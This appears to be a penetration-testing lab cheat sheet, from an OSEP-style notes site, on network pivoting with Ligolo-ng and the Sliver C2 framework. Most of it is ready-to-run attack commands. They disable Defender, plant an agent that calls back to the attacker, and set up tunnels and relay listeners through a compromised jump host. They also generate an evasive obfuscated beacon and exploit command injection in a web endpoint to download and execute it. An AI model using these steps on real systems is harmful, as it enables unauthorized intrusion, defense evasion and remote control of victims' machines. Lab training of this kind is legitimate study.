Ligolo

TIP: Make sure defender is disabled or ligolo might get removed

Subnet Access

1) Upload the agent

upload /home/kali/tools/ligolo-ng/agent.exe c:/windows/tasks/agent.exe
ls c:/windows/tasks/agent.exe

2) Start the ligolo proxy on kali

sudo /home/kali/tools/ligolo-ng/proxy -selfcert -laddr 10.10.10.11:4444

3) Delete the interfaces if already exist (in case ip ranges change on next connection)

interface_delete --name osep-challenge
interface_delete --name osep-challenge-vault

4) After starting, create a interface and assign route

interface_create --name osep-challenge
interface_route_add --name osep-challenge --route 10.10.100.0/24

5) Add another one

interface_create --name osep-challenge-vault
interface_route_add --name osep-challenge-vault --route 10.10.200.25/32

6) Connect from the victim machine back to attacker machine with interactive shell

shell
C:\Windows\tasks\agent.exe -connect 10.10.10.11:21 -ignore-cert -retry

Or run directly, will have to Ctrl + C and launch sliver again, don't worry though the process will keep running!

execute -t 1000 -o C:\\Windows\\tasks\\agent.exe -connect 10.10.10.11:4444 -ignore-cert -retry

If you use it without -o it won't wait for console output and no need to ctrl + c

execute C:\\Windows\\tasks\\agent.exe -connect 10.10.10.11:4444 -ignore-cert -retry

7) Select the session

session

8) Start the tunnel

tunnel_start --tun osep-challenge
tunnel_start --tun osep-challenge-vault

Port Forwarding

In this scenario the machine machine05 can't access our machine kali but can access jump01 and we have compromised jump01

machine05 -> jump01:8000 -> kali:80 to download sliver implant from our apache2 server machine05 -> jump01:8088 -> kali:8088 - for sliver beaconing

1) Create listener (from jump01:8000 -> kali:80)

listener_add --addr 10.10.250.10:8000 --to 0.0.0.0:80

2) We'll use the IP of Jump01 - 10.10.250.10

curl -k --negotiate -u : 'http://machine05.domain.com/Internal/GetCPULoad' -X POST -d 'machine05 -Class Win32_Processor);powershell.exe curl http://10.10.250.10:8000/;#'

3) Generate sliver beacon - IP of jump01

generate beacon --http 10.10.250.10:8088 --name sliver.obfuscated --os windows --seconds 5 --jitter 0 --evasion

4) Get the sliver beacon

sudo python3 -m http.server 80
sudo chmod 777 /var/www/html/sliver.obfuscated.exe

5) Get shell access

curl -k --negotiate -u : 'http://machine05.domain.com/Internal/GetCPULoad' -X POST -d 'machine05 -Class Win32_Processor);powershell.exe curl http://10.10.250.10:8000/sliver.obfuscated.exe -O C:\Windows\temp\sliver.obfuscated2.exe ;#'
curl -k --negotiate -u : 'http://machine05.domain.com/Internal/GetCPULoad' -X POST -d 'machine05 -Class Win32_Processor);powershell.exe ls C:\Windows\temp\sliver.obfuscated2.exe ;#'

6) Create another listener (from jump01:8090 -> sliver:8088)

listener_add --addr 10.10.250.10:8088 --to 10.10.10.11:8088

7) Run the .exe

curl -k --negotiate -u : 'http://machine05.domain.com/Internal/GetCPULoad' -X POST -d 'machine05 -Class Win32_Processor);cmd.exe /c C:\Windows\temp\sliver.obfuscated2.exe ;#'

PreviousPivoting NextPortfwd

Last updated 5 months ago

hashtagTIP: Make sure defender is disabled or ligolo might get removed

hashtagSubnet Access

hashtag1) Upload the agent

hashtag2) Start the ligolo proxy on kali

hashtag3) Delete the interfaces if already exist (in case ip ranges change on next connection)

hashtag4) After starting, create a interface and assign route

hashtag5) Add another one

hashtag6) Connect from the victim machine back to attacker machine with interactive shell

hashtag7) Select the session

hashtag8) Start the tunnel

hashtagPort Forwarding

hashtag1) Create listener (from jump01:8000 -> kali:80)

hashtag2) We'll use the IP of Jump01 - 10.10.250.10

hashtag3) Generate sliver beacon - IP of jump01

hashtag4) Get the sliver beacon

hashtag5) Get shell access

hashtag6) Create another listener (from jump01:8090 -> sliver:8088)

hashtag7) Run the .exe